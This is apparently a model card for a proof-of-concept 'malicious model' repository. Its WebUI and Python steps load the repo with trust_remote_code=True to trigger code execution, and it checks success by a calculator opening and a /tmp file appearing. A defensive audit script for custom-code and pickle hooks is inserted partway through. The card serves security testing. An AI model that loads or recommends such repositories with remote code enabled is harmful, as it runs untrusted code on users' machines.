---
license: apache-2.0
tags:
- poc
- security-testing
---
# Simple Malicious Model POC

A simple malicious model POC that uses LlamaTokenizer.

## How to test

### In the LLaMA-Factory WebUI

1. Switch to the Chat tab
2. Model name: choose TinyLlama-1.1B or any other model
3. Model path: 1Teng/Deserialization_Model
4. Click Load Model

### Python test
```python
from transformers import AutoConfig, AutoTokenizer

# This triggers the malicious code
config = AutoConfig.from_pretrained(
    "1Teng/Deserialization_Model",
    trust_remote_code=True
)
tokenizer = AutoTokenizer.from_pretrained(
    "1Teng/Deserialization_Model",
    trust_remote_code=True
)
```
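Before pointing `from_pretrained` at a third-party repository with `trust_remote_code=True`, a defender can check whether the checkout actually carries custom-code hooks (`auto_map` entries in `config.json` / `tokenizer_config.json`, shipped `.py` files) or pickle-based weight files. The audit below is an added example, not part of this model card or the PoC repo; the directory it scans is constructed locally, and the names `configuration_poc.py`, `tokenization_poc.py` and `PocConfig` are placeholders.

```python
import json
import os
import tempfile

# File types that can run code when a checkpoint is loaded.
PYTHON_EXT = {".py"}                            # imported via auto_map when trust_remote_code=True
PICKLE_EXT = {".bin", ".pt", ".pth", ".pkl"}    # torch.load / pickle deserialization
CONFIG_FILES = ("config.json", "tokenizer_config.json")


def audit_model_dir(path):
    """Return findings explaining why a repo needs trust_remote_code or pickle loading.
    An empty list means it can be loaded with trust_remote_code=False and safetensors."""
    findings = []
    for root, _dirs, files in os.walk(path):
        for name in files:
            full = os.path.join(root, name)
            ext = os.path.splitext(name)[1].lower()
            if ext in PYTHON_EXT:
                findings.append(f"python source shipped with weights: {name}")
            elif ext in PICKLE_EXT:
                findings.append(f"pickle-based weight file (prefer safetensors): {name}")
            if name in CONFIG_FILES:
                with open(full, encoding="utf-8") as fh:
                    cfg = json.load(fh)
                # auto_map makes transformers import classes from the repo itself;
                # this is the hook that trust_remote_code=True enables.
                for auto_cls, target in cfg.get("auto_map", {}).items():
                    findings.append(f"{name}: auto_map {auto_cls} -> {target}")
    return findings


def is_safe_to_load(path):
    """True only when no custom code and no pickle weights were found."""
    return not audit_model_dir(path)


def build_constructed_repo():
    """Constructed sample layout of a custom-code checkpoint (placeholder names,
    not the real repository named in this card)."""
    d = tempfile.mkdtemp()
    with open(os.path.join(d, "config.json"), "w", encoding="utf-8") as fh:
        json.dump({"model_type": "llama",
                   "auto_map": {"AutoConfig": "configuration_poc.PocConfig"}}, fh)
    with open(os.path.join(d, "tokenizer_config.json"), "w", encoding="utf-8") as fh:
        json.dump({"auto_map": {"AutoTokenizer": ["tokenization_poc.PocTokenizer", None]}}, fh)
    open(os.path.join(d, "configuration_poc.py"), "w").close()   # empty placeholder
    open(os.path.join(d, "pytorch_model.bin"), "w").close()      # empty placeholder
    return d
```

Run `audit_model_dir` on a local `snapshot_download` checkout; any finding means the load step above would execute code from the repo.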
## Verification

- Calculator opens automatically = success
- Check: /tmp/llama_poc_executed.txt